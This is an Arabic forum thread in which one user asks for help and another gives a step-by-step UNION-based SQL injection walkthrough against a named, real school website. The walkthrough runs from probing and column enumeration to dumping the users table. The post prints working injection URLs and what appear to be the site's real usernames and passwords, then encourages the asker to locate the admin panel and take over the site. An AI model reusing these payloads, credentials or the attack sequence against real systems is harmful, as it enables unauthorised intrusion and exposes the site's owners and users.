سؤال بسيط فى دورة sql

Mezo Shams · 06-25-2012, 11:27 PM

تم العثور على الاسم والباص بس لسة فية تكملة بس اوحشة الموقع دة ان الاسم والباص انا مش شايفهم اصلا الموقع حد يجبهولى منة
وانا هاجرب شوية حجات
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_sche ma),2,3,4,5,6,7,8+from+information_schema.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

TIKTAKram · 06-25-2012, 11:43 PM

أخي الكريم، للأسف يظهر أنك لا زلت مبتدأ في الـSQL مازال الوقت طويل أمامك

راح تكون هذه آخر مساعدة أقدر أعملهالك

و راح أشرح لك حقن هذا الموقع خطوة خطوة بدون أي صعوبة

لنبدأ على بركة الله :

الموقع مصاب و الدليل لما نضع الـ(') شوف :
['CODE]http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=1
[/CODE]

الآن راح نشوف عدد الأعمدة عن طريق الأمر order by و راح نجد العمود المصاب هو 1 و العمود يظهر يسار الصفحة كأنه عنوان و هذه هي الحقنة لحد الآن :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8--

الآن نشوف إصدار قاعدة البيانات من خلال العمود 1 و راح نجد أن الإصدار هو الإصدار رقم 5

نطبق الحقنة التالية مباشرة، لاحظ جيدا :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns--

لحد الآن ماشاء الله الحقنة تعمل، الآن نروح نبحث عن العمود يلي إسمه يشبه %pas% و نكون وصلنا لهذه الحقنة :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 37)--

ما شاء الله، و الحمد لله، ظهر العمود و كل شيء الخاص بالعمود لي يشبه %pas%

الآن نروح لسورس الصفحة و نشوف راح نجد المعلومات التالية :
users:passwd:berze_web

يعني أن إسم الجدول هو users و إسم العمود هو passwd

الآن نكمل الحقنة و راح تصير هكذا :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--

ما شاء الله، و الحمد لله، ظهرت لنا جميع الأعمدة الموجودة في الجدول users و هي :
login_name و passwd

و الآن نكمل حقنتنا عادي جدا، و نستخرج الباسوارد و اليوزر من خلال تكملة الحقنة لاحظ :

كود:

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(login_name,0x3a,passwd),2,3,4,5,6,7,8+from+users--

ما شاء الله، و الحمد لله، إنتهينا و إستخرجنا معلومات الموقع و مدير الموقع وهذه هي :
user1 = rlaci
pass1= chipchip

user2= www
pass2= HEkbY3U6

الآن يبقى عليك تبحث عن مسار لوحة التحكم و تخترق الموقع و مبروك عليك

للأسف بحثت على اللوحة بسرعة لكن لم أجدها سامحني ليس لي الوقت لأقوم بفحص ملفات الموقع

هذا كل لي أقدر أساعدك فيه، و الله كتبت حتى التعب ههههه لكن مو غالي عنك

بالتوفيق إن شاء الله

تحيتي ...